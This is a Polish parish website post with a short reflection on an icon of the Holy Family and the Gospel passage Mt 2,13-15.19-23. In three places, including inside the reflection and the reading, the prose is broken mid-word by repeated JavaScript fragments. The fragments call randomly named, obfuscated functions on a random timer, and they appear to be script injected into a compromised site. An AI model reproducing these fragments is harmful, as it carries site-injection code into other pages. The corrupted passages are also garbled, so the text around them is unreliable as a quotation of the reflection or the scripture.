wstazka
Kościół Świętego Ducha
Strona główna -> Aktualności
Wpisał:adminicdmstracja Data: 28-12-2013
ikona

Zwyczajna rodzina.

Znalazłam dziś rano pewną ikonę w internetach. Urzekła mnie taka jej zwyczajność. Trochę przypomina mi zdjęcia, które nie raz oglądałam w rodzinnych albumach. Św. Józef trzyma Jezusa na baranach. Jak andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to dziecko. Obok Maryja. Tak po prostu.

Mamy jakieś spaczone myślenie o św. Rodzinie. Anioły, kwiaty, pastele. Idealność.  A tam było zwyczajnie.

Ks. Orzechowski powiedział kiedyś, że dom w Nazarecie był tym, gdzie Najświętszy Sakrament plątał się między nogami i być może nie raz dostał ścierką po głowie.

Dziś po raz kolejny urzeka mnie normalność św. Rodziny. To szansa, że moja rodzina w swojej zwyczajności stanie się kiedyś święta.

Ewa Łaskarzewska

(Mt 2,13-15.19-23) Gdy Mędrcy odjechali, oandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to anioł Pański ukazał się Józefowi we śnie i rzekł: Wstań, weź Dziecię i Jego Matkę i uchodź do Egiptu; pozostań tam, aż ci powiem; bo Herod będzie szukał Dziecięcia, aby Je zgładzić. On wstał, wziął w nocy Dziecię i Jego Matkę i udał się do Egiptu; tam pozostał aż do śmierci Heroda. Tak miało się spełnić słowo, które Pan powiedział przez Proroka: Z Egiptu wezwałem Syna mego. A gdy Herod umarł, oandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to Józefowi w Egipcie ukazał się anioł Pański we śnie, i rzekł: Wstań, weź Dziecię i Jego Matkę i idź do ziemi Izraela, bo już umarli ci, którzy czyhali na życie Dziecięcia . On więc wstał, wziął Dziecię i Jego Matkę i wrócił do ziemi Izraela. Lecz gdy posłyszał, że w Judei panuje Archelaos w miejsce ojca swego, Heroda, bał się tam iść. Otrzymawszy zaś we śnie nakaz, udał się w strony Galilei. Przybył do miasta, zwanego Nazaret, i tam osiadł. Tak miało się spełnić słowo Proroków: Nazwany będzie Nazarejczykiem.

Podziel się na:

Komentarze
Przejdź do:
aktualności dla ducha video